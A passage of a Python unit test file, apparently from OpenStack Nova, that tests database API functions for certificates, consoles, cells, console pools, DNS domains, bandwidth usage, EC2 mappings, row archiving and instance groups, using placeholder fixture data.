class CertificateTestCase(test.TestCase, ModelsObjectComparatorMixin):
def setUp(self):
super(CertificateTestCase, self).setUp()
self.ctxt = context.get_admin_context()
self.created = self._certificates_create()
def _get_certs_values(self):
base_values = {
'user_id': 'user',
'project_id': 'project',
'file_name': 'filename'
}
return [{k: v + str(x) for k, v in base_values.items()}
for x in range(1, 4)]
def _certificates_create(self):
return [db.certificate_create(self.ctxt, cert)
for cert in self._get_certs_values()]
def test_certificate_create(self):
ignored_keys = ['id', 'deleted', 'deleted_at', 'created_at',
'updated_at']
for i, cert in enumerate(self._get_certs_values()):
self._assertEqualObjects(self.created[i], cert,
ignored_keys=ignored_keys)
def test_certificate_get_all_by_project(self):
cert = db.certificate_get_all_by_project(self.ctxt,
self.created[1].project_id)
self._assertEqualObjects(self.created[1], cert[0])
def test_certificate_get_all_by_user(self):
cert = db.certificate_get_all_by_user(self.ctxt,
self.created[1].user_id)
self._assertEqualObjects(self.created[1], cert[0])
def test_certificate_get_all_by_user_and_project(self):
cert = db.certificate_get_all_by_user_and_project(self.ctxt,
self.created[1].user_id, self.created[1].project_id)
self._assertEqualObjects(self.created[1], cert[0])
class ConsoleTestCase(test.TestCase, ModelsObjectComparatorMixin):
def setUp(self):
super(ConsoleTestCase, self).setUp()
self.ctxt = context.get_admin_context()
pools_data = [
{'address': '192.168.10.10',
'username': 'user1',
'password': 'passwd1',
'console_type': 'type1',
'public_hostname': 'public_host1',
'host': 'host1',
'compute_host': 'compute_host1',
},
{'address': '192.168.10.11',
'username': 'user2',
'password': 'passwd2',
'console_type': 'type2',
'public_hostname': 'public_host2',
'host': 'host2',
'compute_host': 'compute_host2',
},
]
self.console_pools = [db.console_pool_create(self.ctxt, val)
for val in pools_data]
instance_uuid = uuidutils.generate_uuid()
db.instance_create(self.ctxt, {'uuid': instance_uuid})
self.console_data = [{'instance_name': 'name' + str(x),
'instance_uuid': instance_uuid,
'password': 'pass' + str(x),
'port': 7878 + x,
'pool_id': self.console_pools[x]['id']}
for x in range(len(pools_data))]
self.consoles = [db.console_create(self.ctxt, val)
for val in self.console_data]
def test_console_create(self):
ignored_keys = ['id', 'deleted', 'deleted_at', 'created_at',
'updated_at']
for console in self.consoles:
self.assertIsNotNone(console['id'])
self._assertEqualListsOfObjects(self.console_data, self.consoles,
ignored_keys=ignored_keys)
def test_console_get_by_id(self):
console = self.consoles[0]
console_get = db.console_get(self.ctxt, console['id'])
self._assertEqualObjects(console, console_get,
ignored_keys=['pool'])
def test_console_get_by_id_uuid(self):
console = self.consoles[0]
console_get = db.console_get(self.ctxt, console['id'],
console['instance_uuid'])
self._assertEqualObjects(console, console_get,
ignored_keys=['pool'])
def test_console_get_by_pool_instance(self):
console = self.consoles[0]
console_get = db.console_get_by_pool_instance(self.ctxt,
console['pool_id'], console['instance_uuid'])
self._assertEqualObjects(console, console_get,
ignored_keys=['pool'])
def test_console_get_all_by_instance(self):
instance_uuid = self.consoles[0]['instance_uuid']
consoles_get = db.console_get_all_by_instance(self.ctxt, instance_uuid)
self._assertEqualListsOfObjects(self.consoles, consoles_get)
def test_console_get_all_by_instance_with_pool(self):
instance_uuid = self.consoles[0]['instance_uuid']
consoles_get = db.console_get_all_by_instance(self.ctxt, instance_uuid,
columns_to_join=['pool'])
self._assertEqualListsOfObjects(self.consoles, consoles_get,
ignored_keys=['pool'])
self._assertEqualListsOfObjects([pool for pool in self.console_pools],
[c['pool'] for c in consoles_get])
def test_console_get_all_by_instance_empty(self):
consoles_get = db.console_get_all_by_instance(self.ctxt,
uuidutils.generate_uuid())
self.assertEqual(consoles_get, [])
def test_console_delete(self):
console_id = self.consoles[0]['id']
db.console_delete(self.ctxt, console_id)
self.assertRaises(exception.ConsoleNotFound, db.console_get,
self.ctxt, console_id)
def test_console_get_by_pool_instance_not_found(self):
self.assertRaises(exception.ConsoleNotFoundInPoolForInstance,
db.console_get_by_pool_instance, self.ctxt,
self.consoles[0]['pool_id'],
uuidutils.generate_uuid())
def test_console_get_not_found(self):
self.assertRaises(exception.ConsoleNotFound, db.console_get,
self.ctxt, 100500)
def test_console_get_not_found_instance(self):
self.assertRaises(exception.ConsoleNotFoundForInstance, db.console_get,
self.ctxt, self.consoles[0]['id'],
uuidutils.generate_uuid())
class CellTestCase(test.TestCase, ModelsObjectComparatorMixin):
_ignored_keys = ['id', 'deleted', 'deleted_at', 'created_at', 'updated_at']
def setUp(self):
super(CellTestCase, self).setUp()
self.ctxt = context.get_admin_context()
def _get_cell_base_values(self):
return {
'name': 'myname',
'api_url': 'apiurl',
'transport_url': 'transporturl',
'weight_offset': 0.5,
'weight_scale': 1.5,
'is_parent': True,
}
def _cell_value_modify(self, value, step):
if isinstance(value, str):
return value + str(step)
elif isinstance(value, float):
return value + step + 0.6
elif isinstance(value, bool):
return bool(step % 2)
elif isinstance(value, int):
return value + step
def _create_cells(self):
test_values = []
for x in range(1, 4):
modified_val = {k: self._cell_value_modify(v, x)
for k, v in self._get_cell_base_values().items()}
db.cell_create(self.ctxt, modified_val)
test_values.append(modified_val)
return test_values
def test_cell_create(self):
cell = db.cell_create(self.ctxt, self._get_cell_base_values())
self.assertIsNotNone(cell['id'])
self._assertEqualObjects(cell, self._get_cell_base_values(),
ignored_keys=self._ignored_keys)
def test_cell_update(self):
db.cell_create(self.ctxt, self._get_cell_base_values())
new_values = {
'api_url': 'apiurl1',
'transport_url': 'transporturl1',
'weight_offset': 0.6,
'weight_scale': 1.6,
'is_parent': False,
}
test_cellname = self._get_cell_base_values()['name']
updated_cell = db.cell_update(self.ctxt, test_cellname, new_values)
self._assertEqualObjects(updated_cell, new_values,
ignored_keys=self._ignored_keys + ['name'])
def test_cell_delete(self):
new_cells = self._create_cells()
for cell in new_cells:
test_cellname = cell['name']
db.cell_delete(self.ctxt, test_cellname)
self.assertRaises(exception.CellNotFound, db.cell_get, self.ctxt,
test_cellname)
def test_cell_get(self):
new_cells = self._create_cells()
for cell in new_cells:
cell_get = db.cell_get(self.ctxt, cell['name'])
self._assertEqualObjects(cell_get, cell,
ignored_keys=self._ignored_keys)
def test_cell_get_all(self):
new_cells = self._create_cells()
cells = db.cell_get_all(self.ctxt)
self.assertEqual(len(new_cells), len(cells))
cells_byname = {newcell['name']: newcell
for newcell in new_cells}
for cell in cells:
self._assertEqualObjects(cell, cells_byname[cell['name']],
self._ignored_keys)
def test_cell_get_not_found(self):
self._create_cells()
self.assertRaises(exception.CellNotFound, db.cell_get, self.ctxt,
'cellnotinbase')
def test_cell_update_not_found(self):
self._create_cells()
self.assertRaises(exception.CellNotFound, db.cell_update, self.ctxt,
'cellnotinbase', self._get_cell_base_values())
def test_cell_create_exists(self):
db.cell_create(self.ctxt, self._get_cell_base_values())
self.assertRaises(exception.CellExists, db.cell_create,
self.ctxt, self._get_cell_base_values())
class ConsolePoolTestCase(test.TestCase, ModelsObjectComparatorMixin):
def setUp(self):
super(ConsolePoolTestCase, self).setUp()
self.ctxt = context.get_admin_context()
self.test_console_pool_1 = {
'address': '192.168.2.10',
'username': 'user_1',
'password': 'secret_123',
'console_type': 'type_1',
'public_hostname': 'public_hostname_123',
'host': 'localhost',
'compute_host': '127.0.0.1',
}
self.test_console_pool_2 = {
'address': '192.168.2.11',
'username': 'user_2',
'password': 'secret_1234',
'console_type': 'type_2',
'public_hostname': 'public_hostname_1234',
'host': '127.0.0.1',
'compute_host': 'localhost',
}
self.test_console_pool_3 = {
'address': '192.168.2.12',
'username': 'user_3',
'password': 'secret_12345',
'console_type': 'type_2',
'public_hostname': 'public_hostname_12345',
'host': '127.0.0.1',
'compute_host': '192.168.1.1',
}
def test_console_pool_create(self):
console_pool = db.console_pool_create(
self.ctxt, self.test_console_pool_1)
self.assertIsNotNone(console_pool.get('id'))
ignored_keys = ['deleted', 'created_at', 'updated_at',
'deleted_at', 'id']
self._assertEqualObjects(
console_pool, self.test_console_pool_1, ignored_keys)
def test_console_pool_create_duplicate(self):
db.console_pool_create(self.ctxt, self.test_console_pool_1)
self.assertRaises(exception.ConsolePoolExists, db.console_pool_create,
self.ctxt, self.test_console_pool_1)
def test_console_pool_get_by_host_type(self):
params = [
self.test_console_pool_1,
self.test_console_pool_2,
]
for p in params:
db.console_pool_create(self.ctxt, p)
ignored_keys = ['deleted', 'created_at', 'updated_at',
'deleted_at', 'id', 'consoles']
cp = self.test_console_pool_1
db_cp = db.console_pool_get_by_host_type(
self.ctxt, cp['compute_host'], cp['host'], cp['console_type']
)
self._assertEqualObjects(cp, db_cp, ignored_keys)
def test_console_pool_get_by_host_type_no_resuls(self):
self.assertRaises(
exception.ConsolePoolNotFoundForHostType,
db.console_pool_get_by_host_type, self.ctxt, 'compute_host',
'host', 'console_type')
def test_console_pool_get_all_by_host_type(self):
params = [
self.test_console_pool_1,
self.test_console_pool_2,
self.test_console_pool_3,
]
for p in params:
db.console_pool_create(self.ctxt, p)
ignored_keys = ['deleted', 'created_at', 'updated_at',
'deleted_at', 'id', 'consoles']
cp = self.test_console_pool_2
db_cp = db.console_pool_get_all_by_host_type(
self.ctxt, cp['host'], cp['console_type'])
self._assertEqualListsOfObjects(
db_cp, [self.test_console_pool_2, self.test_console_pool_3],
ignored_keys)
def test_console_pool_get_all_by_host_type_no_results(self):
res = db.console_pool_get_all_by_host_type(
self.ctxt, 'cp_host', 'cp_console_type')
self.assertEqual([], res)
class DnsdomainTestCase(test.TestCase):
def setUp(self):
super(DnsdomainTestCase, self).setUp()
self.ctxt = context.get_admin_context()
self.domain = 'test.domain'
self.testzone = 'testzone'
self.project = 'fake'
def test_dnsdomain_register_for_zone(self):
db.dnsdomain_register_for_zone(self.ctxt, self.domain, self.testzone)
domain = db.dnsdomain_get(self.ctxt, self.domain)
self.assertEqual(domain['domain'], self.domain)
self.assertEqual(domain['availability_zone'], self.testzone)
self.assertEqual(domain['scope'], 'private')
def test_dnsdomain_register_for_project(self):
db.dnsdomain_register_for_project(self.ctxt, self.domain, self.project)
domain = db.dnsdomain_get(self.ctxt, self.domain)
self.assertEqual(domain['domain'], self.domain)
self.assertEqual(domain['project_id'], self.project)
self.assertEqual(domain['scope'], 'public')
def test_dnsdomain_unregister(self):
db.dnsdomain_register_for_zone(self.ctxt, self.domain, self.testzone)
db.dnsdomain_unregister(self.ctxt, self.domain)
domain = db.dnsdomain_get(self.ctxt, self.domain)
self.assertIsNone(domain)
def test_dnsdomain_get_all(self):
d_list = ['test.domain.one', 'test.domain.two']
db.dnsdomain_register_for_zone(self.ctxt, d_list[0], 'zone')
db.dnsdomain_register_for_zone(self.ctxt, d_list[1], 'zone')
db_list = db.dnsdomain_get_all(self.ctxt)
db_domain_list = [d.domain for d in db_list]
self.assertEqual(sorted(d_list), sorted(db_domain_list))
class BwUsageTestCase(test.TestCase, ModelsObjectComparatorMixin):
_ignored_keys = ['id', 'deleted', 'deleted_at', 'created_at', 'updated_at']
def setUp(self):
super(BwUsageTestCase, self).setUp()
self.ctxt = context.get_admin_context()
self.useFixture(test.TimeOverride())
def test_bw_usage_get_by_uuids(self):
now = timeutils.utcnow()
start_period = now - datetime.timedelta(seconds=10)
start_period_str = timeutils.strtime(start_period)
uuid3_refreshed = now - datetime.timedelta(seconds=5)
uuid3_refreshed_str = timeutils.strtime(uuid3_refreshed)
expected_bw_usages = {
'fake_uuid1': {'uuid': 'fake_uuid1',
'mac': 'fake_mac1',
'start_period': start_period,
'bw_in': 100,
'bw_out': 200,
'last_ctr_in': 12345,
'last_ctr_out': 67890,
'last_refreshed': now},
'fake_uuid2': {'uuid': 'fake_uuid2',
'mac': 'fake_mac2',
'start_period': start_period,
'bw_in': 200,
'bw_out': 300,
'last_ctr_in': 22345,
'last_ctr_out': 77890,
'last_refreshed': now},
'fake_uuid3': {'uuid': 'fake_uuid3',
'mac': 'fake_mac3',
'start_period': start_period,
'bw_in': 400,
'bw_out': 500,
'last_ctr_in': 32345,
'last_ctr_out': 87890,
'last_refreshed': uuid3_refreshed}
}
bw_usages = db.bw_usage_get_by_uuids(self.ctxt,
['fake_uuid1', 'fake_uuid2'], start_period_str)
# No matches
self.assertEqual(len(bw_usages), 0)
# Add 3 entries
db.bw_usage_update(self.ctxt, 'fake_uuid1',
'fake_mac1', start_period_str,
100, 200, 12345, 67890)
db.bw_usage_update(self.ctxt, 'fake_uuid2',
'fake_mac2', start_period_str,
100, 200, 42, 42)
# Test explicit refreshed time
db.bw_usage_update(self.ctxt, 'fake_uuid3',
'fake_mac3', start_period_str,
400, 500, 32345, 87890,
last_refreshed=uuid3_refreshed_str)
# Update 2nd entry
db.bw_usage_update(self.ctxt, 'fake_uuid2',
'fake_mac2', start_period_str,
200, 300, 22345, 77890)
bw_usages = db.bw_usage_get_by_uuids(self.ctxt,
['fake_uuid1', 'fake_uuid2', 'fake_uuid3'], start_period_str)
self.assertEqual(len(bw_usages), 3)
for usage in bw_usages:
self._assertEqualObjects(expected_bw_usages[usage['uuid']], usage,
ignored_keys=self._ignored_keys)
def test_bw_usage_get(self):
now = timeutils.utcnow()
start_period = now - datetime.timedelta(seconds=10)
start_period_str = timeutils.strtime(start_period)
expected_bw_usage = {'uuid': 'fake_uuid1',
'mac': 'fake_mac1',
'start_period': start_period,
'bw_in': 100,
'bw_out': 200,
'last_ctr_in': 12345,
'last_ctr_out': 67890,
'last_refreshed': now}
bw_usage = db.bw_usage_get(self.ctxt, 'fake_uuid1', start_period_str,
'fake_mac1')
self.assertIsNone(bw_usage)
db.bw_usage_update(self.ctxt, 'fake_uuid1',
'fake_mac1', start_period_str,
100, 200, 12345, 67890)
bw_usage = db.bw_usage_get(self.ctxt, 'fake_uuid1', start_period_str,
'fake_mac1')
self._assertEqualObjects(expected_bw_usage, bw_usage,
ignored_keys=self._ignored_keys)
class Ec2TestCase(test.TestCase):
def setUp(self):
super(Ec2TestCase, self).setUp()
self.ctxt = context.RequestContext('fake_user', 'fake_project')
def test_ec2_ids_not_found_are_printable(self):
def check_exc_format(method, value):
try:
method(self.ctxt, value)
except exception.NotFound as exc:
self.assertIn(six.text_type(value), six.text_type(exc))
check_exc_format(db.get_instance_uuid_by_ec2_id, 123456)
check_exc_format(db.ec2_snapshot_get_by_ec2_id, 123456)
check_exc_format(db.ec2_snapshot_get_by_uuid, 'fake')
def test_ec2_volume_create(self):
vol = db.ec2_volume_create(self.ctxt, 'fake-uuid')
self.assertIsNotNone(vol['id'])
self.assertEqual(vol['uuid'], 'fake-uuid')
def test_ec2_volume_get_by_id(self):
vol = db.ec2_volume_create(self.ctxt, 'fake-uuid')
vol2 = db.ec2_volume_get_by_id(self.ctxt, vol['id'])
self.assertEqual(vol2['uuid'], vol['uuid'])
def test_ec2_volume_get_by_uuid(self):
vol = db.ec2_volume_create(self.ctxt, 'fake-uuid')
vol2 = db.ec2_volume_get_by_uuid(self.ctxt, vol['uuid'])
self.assertEqual(vol2['id'], vol['id'])
def test_ec2_snapshot_create(self):
snap = db.ec2_snapshot_create(self.ctxt, 'fake-uuid')
self.assertIsNotNone(snap['id'])
self.assertEqual(snap['uuid'], 'fake-uuid')
def test_ec2_snapshot_get_by_ec2_id(self):
snap = db.ec2_snapshot_create(self.ctxt, 'fake-uuid')
snap2 = db.ec2_snapshot_get_by_ec2_id(self.ctxt, snap['id'])
self.assertEqual(snap2['uuid'], 'fake-uuid')
def test_ec2_snapshot_get_by_uuid(self):
snap = db.ec2_snapshot_create(self.ctxt, 'fake-uuid')
snap2 = db.ec2_snapshot_get_by_uuid(self.ctxt, 'fake-uuid')
self.assertEqual(snap['id'], snap2['id'])
def test_ec2_snapshot_get_by_ec2_id_not_found(self):
self.assertRaises(exception.SnapshotNotFound,
db.ec2_snapshot_get_by_ec2_id,
self.ctxt, 123456)
def test_ec2_snapshot_get_by_uuid_not_found(self):
self.assertRaises(exception.SnapshotNotFound,
db.ec2_snapshot_get_by_uuid,
self.ctxt, 'fake-uuid')
def test_ec2_instance_create(self):
inst = db.ec2_instance_create(self.ctxt, 'fake-uuid')
self.assertIsNotNone(inst['id'])
self.assertEqual(inst['uuid'], 'fake-uuid')
def test_ec2_instance_get_by_uuid(self):
inst = db.ec2_instance_create(self.ctxt, 'fake-uuid')
inst2 = db.ec2_instance_get_by_uuid(self.ctxt, 'fake-uuid')
self.assertEqual(inst['id'], inst2['id'])
def test_ec2_instance_get_by_id(self):
inst = db.ec2_instance_create(self.ctxt, 'fake-uuid')
inst2 = db.ec2_instance_get_by_id(self.ctxt, inst['id'])
self.assertEqual(inst['id'], inst2['id'])
def test_ec2_instance_get_by_uuid_not_found(self):
self.assertRaises(exception.InstanceNotFound,
db.ec2_instance_get_by_uuid,
self.ctxt, 'uuid-not-present')
def test_ec2_instance_get_by_id_not_found(self):
self.assertRaises(exception.InstanceNotFound,
db.ec2_instance_get_by_uuid,
self.ctxt, 12345)
def test_get_instance_uuid_by_ec2_id(self):
inst = db.ec2_instance_create(self.ctxt, 'fake-uuid')
inst_uuid = db.get_instance_uuid_by_ec2_id(self.ctxt, inst['id'])
self.assertEqual(inst_uuid, 'fake-uuid')
def test_get_instance_uuid_by_ec2_id_not_found(self):
self.assertRaises(exception.InstanceNotFound,
db.get_instance_uuid_by_ec2_id,
self.ctxt, 100500)
class ArchiveTestCase(test.TestCase):
def setUp(self):
super(ArchiveTestCase, self).setUp()
self.context = context.get_admin_context()
self.engine = get_engine()
self.conn = self.engine.connect()
self.instance_id_mappings = models.InstanceIdMapping.__table__
self.shadow_instance_id_mappings = sqlalchemyutils.get_table(
self.engine, "shadow_instance_id_mappings")
self.dns_domains = models.DNSDomain.__table__
self.shadow_dns_domains = sqlalchemyutils.get_table(
self.engine, "shadow_dns_domains")
self.consoles = models.Console.__table__
self.shadow_consoles = sqlalchemyutils.get_table(
self.engine, "shadow_consoles")
self.console_pools = models.ConsolePool.__table__
self.shadow_console_pools = sqlalchemyutils.get_table(
self.engine, "shadow_console_pools")
self.instances = models.Instance.__table__
self.shadow_instances = sqlalchemyutils.get_table(
self.engine, "shadow_instances")
self.uuidstrs = []
for _ in range(6):
self.uuidstrs.append(stdlib_uuid.uuid4().hex)
def _assert_shadow_tables_empty_except(self, *exceptions):
"""Ensure shadow tables are empty
This method ensures that all the shadow tables in the schema,
except for specificially named exceptions, are empty. This
makes sure that archiving isn't moving unexpected content.
"""
metadata = MetaData(bind=self.engine)
metadata.reflect()
for table in metadata.tables:
if table.startswith("shadow_") and table not in exceptions:
rows = self.conn.execute("select * from %s" % table).fetchall()
self.assertEqual(rows, [], "Table %s not empty" % table)
def test_shadow_tables(self):
metadata = MetaData(bind=self.engine)
metadata.reflect()
for table_name in metadata.tables:
# NOTE(rpodolyaka): migration 209 introduced a few new tables,
# which don't have shadow tables and it's
# completely OK, so we should skip them here
if table_name.startswith("dump_"):
continue
# NOTE(snikitin): migration 266 introduced a new table 'tags',
# which have no shadow table and it's
# completely OK, so we should skip it here
if table_name == 'tags':
continue
if table_name.startswith("shadow_"):
self.assertIn(table_name[7:], metadata.tables)
continue
self.assertTrue(db_utils.check_shadow_table(self.engine,
table_name))
self._assert_shadow_tables_empty_except()
def test_archive_deleted_rows(self):
# Add 6 rows to table
for uuidstr in self.uuidstrs:
ins_stmt = self.instance_id_mappings.insert().values(uuid=uuidstr)
self.conn.execute(ins_stmt)
# Set 4 to deleted
update_statement = self.instance_id_mappings.update().\
where(self.instance_id_mappings.c.uuid.in_(self.uuidstrs[:4]))\
.values(deleted=1)
self.conn.execute(update_statement)
qiim = sql.select([self.instance_id_mappings]).where(self.
instance_id_mappings.c.uuid.in_(self.uuidstrs))
rows = self.conn.execute(qiim).fetchall()
# Verify we have 6 in main
self.assertEqual(len(rows), 6)
qsiim = sql.select([self.shadow_instance_id_mappings]).\
where(self.shadow_instance_id_mappings.c.uuid.in_(
self.uuidstrs))
rows = self.conn.execute(qsiim).fetchall()
# Verify we have 0 in shadow
self.assertEqual(len(rows), 0)
# Archive 2 rows
db.archive_deleted_rows(self.context, max_rows=2)
rows = self.conn.execute(qiim).fetchall()
# Verify we have 4 left in main
self.assertEqual(len(rows), 4)
rows = self.conn.execute(qsiim).fetchall()
# Verify we have 2 in shadow
self.assertEqual(len(rows), 2)
# Archive 2 more rows
db.archive_deleted_rows(self.context, max_rows=2)
rows = self.conn.execute(qiim).fetchall()
# Verify we have 2 left in main
self.assertEqual(len(rows), 2)
rows = self.conn.execute(qsiim).fetchall()
# Verify we have 4 in shadow
self.assertEqual(len(rows), 4)
# Try to archive more, but there are no deleted rows left.
db.archive_deleted_rows(self.context, max_rows=2)
rows = self.conn.execute(qiim).fetchall()
# Verify we still have 2 left in main
self.assertEqual(len(rows), 2)
rows = self.conn.execute(qsiim).fetchall()
# Verify we still have 4 in shadow
self.assertEqual(len(rows), 4)
# Ensure only deleted rows were deleted
self._assert_shadow_tables_empty_except(
'shadow_instance_id_mappings')
def test_archive_deleted_rows_for_every_uuid_table(self):
tablenames = []
for model_class in six.itervalues(models.__dict__):
if hasattr(model_class, "__tablename__"):
tablenames.append(model_class.__tablename__)
tablenames.sort()
for tablename in tablenames:
self._test_archive_deleted_rows_for_one_uuid_table(tablename)
def _test_archive_deleted_rows_for_one_uuid_table(self, tablename):
""":returns: 0 on success, 1 if no uuid column, 2 if insert failed."""
main_table = sqlalchemyutils.get_table(self.engine, tablename)
if not hasattr(main_table.c, "uuid"):
# Not a uuid table, so skip it.
return 1
shadow_table = sqlalchemyutils.get_table(
self.engine, "shadow_" + tablename)
# Add 6 rows to table
for uuidstr in self.uuidstrs:
ins_stmt = main_table.insert().values(uuid=uuidstr)
try:
self.conn.execute(ins_stmt)
except (db_exc.DBError, OperationalError):
# This table has constraints that require a table-specific
# insert, so skip it.
return 2
# Set 4 to deleted
update_statement = main_table.update().\
where(main_table.c.uuid.in_(self.uuidstrs[:4]))\
.values(deleted=1)
self.conn.execute(update_statement)
qmt = sql.select([main_table]).where(main_table.c.uuid.in_(
self.uuidstrs))
rows = self.conn.execute(qmt).fetchall()
# Verify we have 6 in main
self.assertEqual(len(rows), 6)
qst = sql.select([shadow_table]).\
where(shadow_table.c.uuid.in_(self.uuidstrs))
rows = self.conn.execute(qst).fetchall()
# Verify we have 0 in shadow
self.assertEqual(len(rows), 0)
# Archive 2 rows
db.archive_deleted_rows_for_table(self.context, tablename, max_rows=2)
# Verify we have 4 left in main
rows = self.conn.execute(qmt).fetchall()
self.assertEqual(len(rows), 4)
# Verify we have 2 in shadow
rows = self.conn.execute(qst).fetchall()
self.assertEqual(len(rows), 2)
# Archive 2 more rows
db.archive_deleted_rows_for_table(self.context, tablename, max_rows=2)
# Verify we have 2 left in main
rows = self.conn.execute(qmt).fetchall()
self.assertEqual(len(rows), 2)
# Verify we have 4 in shadow
rows = self.conn.execute(qst).fetchall()
self.assertEqual(len(rows), 4)
# Try to archive more, but there are no deleted rows left.
db.archive_deleted_rows_for_table(self.context, tablename, max_rows=2)
# Verify we still have 2 left in main
rows = self.conn.execute(qmt).fetchall()
self.assertEqual(len(rows), 2)
# Verify we still have 4 in shadow
rows = self.conn.execute(qst).fetchall()
self.assertEqual(len(rows), 4)
return 0
def test_archive_deleted_rows_no_id_column(self):
uuidstr0 = self.uuidstrs[0]
ins_stmt = self.dns_domains.insert().values(domain=uuidstr0)
self.conn.execute(ins_stmt)
update_statement = self.dns_domains.update().\
where(self.dns_domains.c.domain == uuidstr0).\
values(deleted=True)
self.conn.execute(update_statement)
qdd = sql.select([self.dns_domains], self.dns_domains.c.domain ==
uuidstr0)
rows = self.conn.execute(qdd).fetchall()
self.assertEqual(len(rows), 1)
qsdd = sql.select([self.shadow_dns_domains],
self.shadow_dns_domains.c.domain == uuidstr0)
rows = self.conn.execute(qsdd).fetchall()
self.assertEqual(len(rows), 0)
db.archive_deleted_rows(self.context, max_rows=1)
rows = self.conn.execute(qdd).fetchall()
self.assertEqual(len(rows), 0)
rows = self.conn.execute(qsdd).fetchall()
self.assertEqual(len(rows), 1)
self._assert_shadow_tables_empty_except(
'shadow_dns_domains',
)
def test_archive_deleted_rows_fk_constraint(self):
# consoles.pool_id depends on console_pools.id
# SQLite doesn't enforce foreign key constraints without a pragma.
dialect = self.engine.url.get_dialect()
if dialect == sqlite.dialect:
# We're seeing issues with foreign key support in SQLite 3.6.20
# SQLAlchemy doesn't support it at all with < SQLite 3.6.19
# It works fine in SQLite 3.7.
# So return early to skip this test if running SQLite < 3.7
import sqlite3
tup = sqlite3.sqlite_version_info
if tup[0] < 3 or (tup[0] == 3 and tup[1] < 7):
self.skipTest(
'sqlite version too old for reliable SQLA foreign_keys')
self.conn.execute("PRAGMA foreign_keys = ON")
ins_stmt = self.console_pools.insert().values(deleted=1)
result = self.conn.execute(ins_stmt)
id1 = result.inserted_primary_key[0]
ins_stmt = self.consoles.insert().values(deleted=1,
pool_id=id1)
result = self.conn.execute(ins_stmt)
result.inserted_primary_key[0]
# The first try to archive console_pools should fail, due to FK.
num = db.archive_deleted_rows_for_table(self.context, "console_pools")
self.assertEqual(num, 0)
# Then archiving consoles should work.
num = db.archive_deleted_rows_for_table(self.context, "consoles")
self.assertEqual(num, 1)
# Then archiving console_pools should work.
num = db.archive_deleted_rows_for_table(self.context, "console_pools")
self.assertEqual(num, 1)
self._assert_shadow_tables_empty_except(
'shadow_console_pools',
'shadow_consoles'
)
def test_archive_deleted_rows_2_tables(self):
# Add 6 rows to each table
for uuidstr in self.uuidstrs:
ins_stmt = self.instance_id_mappings.insert().values(uuid=uuidstr)
self.conn.execute(ins_stmt)
ins_stmt2 = self.instances.insert().values(uuid=uuidstr)
self.conn.execute(ins_stmt2)
# Set 4 of each to deleted
update_statement = self.instance_id_mappings.update().\
where(self.instance_id_mappings.c.uuid.in_(self.uuidstrs[:4]))\
.values(deleted=1)
self.conn.execute(update_statement)
update_statement2 = self.instances.update().\
where(self.instances.c.uuid.in_(self.uuidstrs[:4]))\
.values(deleted=1)
self.conn.execute(update_statement2)
# Verify we have 6 in each main table
qiim = sql.select([self.instance_id_mappings]).where(
self.instance_id_mappings.c.uuid.in_(self.uuidstrs))
rows = self.conn.execute(qiim).fetchall()
self.assertEqual(len(rows), 6)
qi = sql.select([self.instances]).where(self.instances.c.uuid.in_(
self.uuidstrs))
rows = self.conn.execute(qi).fetchall()
self.assertEqual(len(rows), 6)
# Verify we have 0 in each shadow table
qsiim = sql.select([self.shadow_instance_id_mappings]).\
where(self.shadow_instance_id_mappings.c.uuid.in_(
self.uuidstrs))
rows = self.conn.execute(qsiim).fetchall()
self.assertEqual(len(rows), 0)
qsi = sql.select([self.shadow_instances]).\
where(self.shadow_instances.c.uuid.in_(self.uuidstrs))
rows = self.conn.execute(qsi).fetchall()
self.assertEqual(len(rows), 0)
# Archive 7 rows, which should be 4 in one table and 3 in the other.
db.archive_deleted_rows(self.context, max_rows=7)
# Verify we have 5 left in the two main tables combined
iim_rows = self.conn.execute(qiim).fetchall()
i_rows = self.conn.execute(qi).fetchall()
self.assertEqual(len(iim_rows) + len(i_rows), 5)
# Verify we have 7 in the two shadow tables combined.
siim_rows = self.conn.execute(qsiim).fetchall()
si_rows = self.conn.execute(qsi).fetchall()
self.assertEqual(len(siim_rows) + len(si_rows), 7)
# Archive the remaining deleted rows.
db.archive_deleted_rows(self.context, max_rows=1)
# Verify we have 4 total left in both main tables.
iim_rows = self.conn.execute(qiim).fetchall()
i_rows = self.conn.execute(qi).fetchall()
self.assertEqual(len(iim_rows) + len(i_rows), 4)
# Verify we have 8 in shadow
siim_rows = self.conn.execute(qsiim).fetchall()
si_rows = self.conn.execute(qsi).fetchall()
self.assertEqual(len(siim_rows) + len(si_rows), 8)
# Try to archive more, but there are no deleted rows left.
db.archive_deleted_rows(self.context, max_rows=500)
# Verify we have 4 total left in both main tables.
iim_rows = self.conn.execute(qiim).fetchall()
i_rows = self.conn.execute(qi).fetchall()
self.assertEqual(len(iim_rows) + len(i_rows), 4)
# Verify we have 8 in shadow
siim_rows = self.conn.execute(qsiim).fetchall()
si_rows = self.conn.execute(qsi).fetchall()
self.assertEqual(len(siim_rows) + len(si_rows), 8)
self._assert_shadow_tables_empty_except(
'shadow_instances',
'shadow_instance_id_mappings'
)
class InstanceGroupDBApiTestCase(test.TestCase, ModelsObjectComparatorMixin):
def setUp(self):
super(InstanceGroupDBApiTestCase, self).setUp()
self.user_id = 'fake_user'
self.project_id = 'fake_project'
self.context = context.RequestContext(self.user_id, self.project_id)
def _get_default_values(self):
return {'name': 'fake_name',
'user_id': self.user_id,
'project_id': self.project_id}
def _create_instance_group(self, context, values, policies=None,
members=None):
return db.instance_group_create(context, values, policies=policies,
members=members)
def test_instance_group_create_no_key(self):
values = self._get_default_values()
result = self._create_instance_group(self.context, values)
ignored_keys = ['id', 'uuid', 'deleted', 'deleted_at', 'updated_at',
'created_at']
self._assertEqualObjects(result, values, ignored_keys)
self.assertTrue(uuidutils.is_uuid_like(result['uuid']))
def test_instance_group_create_with_key(self):
values = self._get_default_values()
values['uuid'] = 'fake_id'
result = self._create_instance_group(self.context, values)
ignored_keys = ['id', 'deleted', 'deleted_at', 'updated_at',
'created_at']
self._assertEqualObjects(result, values, ignored_keys)
def test_instance_group_create_with_same_key(self):
values = self._get_default_values()
values['uuid'] = 'fake_id'
self._create_instance_group(self.context, values)
self.assertRaises(exception.InstanceGroupIdExists,
self._create_instance_group, self.context, values)
def test_instance_group_get(self):
values = self._get_default_values()
result1 = self._create_instance_group(self.context, values)
result2 = db.instance_group_get(self.context, result1['uuid'])
self._assertEqualObjects(result1, result2)
def test_instance_group_update_simple(self):
values = self._get_default_values()
result1 = self._create_instance_group(self.context, values)
values = {'name': 'new_name', 'user_id': 'new_user',
'project_id': 'new_project'}
db.instance_group_update(self.context, result1['uuid'],
values)
result2 = db.instance_group_get(self.context, result1['uuid'])
